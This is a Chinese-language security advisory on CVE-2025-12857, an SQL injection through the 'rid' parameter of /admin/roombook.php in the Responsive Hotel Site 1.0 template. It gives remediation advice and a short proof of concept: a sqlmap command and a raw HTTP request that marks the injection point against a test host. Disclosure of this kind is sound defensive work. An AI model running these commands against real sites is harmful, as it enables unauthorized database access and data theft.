Responsive Hotel Site漏洞CVE-2025-12857
Responsive Hotel Site 1.0 是面向中小型酒店 / 民宿的响应式单页(或多页)网站模板, 以经典前端技术栈为主,兼顾兼容性与开发效率。
目标是为酒店打造适配桌面、平板、手机等全终端品牌展示与基础服务型网站,聚焦 “展示 + 基础交互”,无高级功能(支付、会员系统)。
一、基本情况
Responsive Hotel Site 1.0 聚焦用户体验与视觉适配,兼顾性能与实用性,解决传统酒店网站移动端适配差、加载慢、信息展示混乱问题。

该项目是前端响应式开发的经典实践,覆盖 HTML/CSS/JS 核心知识点,贴合实际商业场景需求,适合入门学习或快速落地小型酒店官网。
栋科技漏洞库关注到在代码项目Responsive Hotel Site 1.0中发现了一个安全漏洞,该漏洞被追踪为CVE-2025-12857,CVSS 4.0评分5.1。
二、漏洞分析
CVE-2025-12857漏洞是在在代码项目Responsive Hotel Site 1.0版本中中发现了一个安全漏洞,对参数rid进行操纵会导致SQL注入。
该漏洞源于攻击者从参数“rid”中注入恶意代码,并直接在SQL查询中使用它,而不需要进行适当的清理或验证。
这就导致了攻击者能够伪造输入值,从而操纵SQL查询并执行未经授权的操作,攻击可以远程发起,该漏洞已被公开披露并可被利用。
具体而言,该漏洞是存在于该代码项目的“/admin/roombook.php”文件中,被发现的一个SQL注入漏洞。
攻击者可利用该SQL注入漏洞实现未经授权数据库访问、敏感数据泄露、数据篡改、全面的系统控制,甚至服务中断,潜在威胁较大。
修复建议:
使用预处理语句和参数绑定:
预处理语句可以防止SQL注入,因为它们将SQL代码与用户输入数据分开。
使用prepare语句时,用户输入的值被视为纯数据,不会被解释为SQL代码。
输入验证和过滤:
严格验证和过滤用户输入数据,以确保其符合预期格式。
最小化数据库用户权限:
确保用于连接到数据库的帐户具有所需的最小权限。避免使用具有高级权限(如“root”或“admin”)的帐户进行日常操作。
定期安全审计:
定期进行代码和系统安全审计,以及时识别和修复潜在的安全漏洞。
三、POC概念验证
1、有效载荷:
管理员已设置登录后刷新可查看
2、以下是通过测试和运行sqlmap工具获得的一些具体信息的屏幕截图:
python sqlmap.py -r data.txt --dbs -v 3 --batch --level 5
//data.txt
GET /admin/roombook.php?rid=1* HTTP/1.1
Host: 10.151.169.235:8833
Cache-Control: max-age=0
Origin: http://10.151.169.235:8833
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.151.169.235:8833/admin/reservation.php
Accept-Encoding: gzip, deflate, p
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=cuq6v5v2e97ubeodt33s8k4ot9
Connection: keep-alive
3、攻击结果

四、影响范围
Responsive Hotel Site 1.0
五、修复建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
六、参考链接
管理员已设置登录后刷新可查看